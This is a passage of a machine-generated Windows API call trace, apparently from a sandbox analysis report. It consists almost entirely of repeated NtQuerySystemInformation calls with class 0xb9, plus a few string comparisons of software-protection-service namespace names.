(SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0287.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0287.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea8, Length=0x30, ResultLength=0x0) [0287.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x38, ResultLength=0x0) [0287.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0287.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0287.740] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0287.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0287.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0287.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0287.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0287.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0287.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0287.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0287.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0287.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0287.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0287.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0287.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0287.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea8, Length=0x30, ResultLength=0x0) [0287.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x38, ResultLength=0x0) [0287.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0287.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0287.801] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0287.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0287.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0287.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0287.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0287.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0287.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0287.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0287.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0287.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0287.825] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0287.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0287.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0287.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0287.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0287.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0287.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0287.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0287.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x50, ResultLength=0x0) [0287.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x50, ResultLength=0x0) [0287.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x50, ResultLength=0x0) [0287.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0287.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0287.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0287.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0287.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0287.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0287.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0287.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0287.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0287.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c740, Length=0x28, ResultLength=0x0) [0287.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0287.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c7c0, 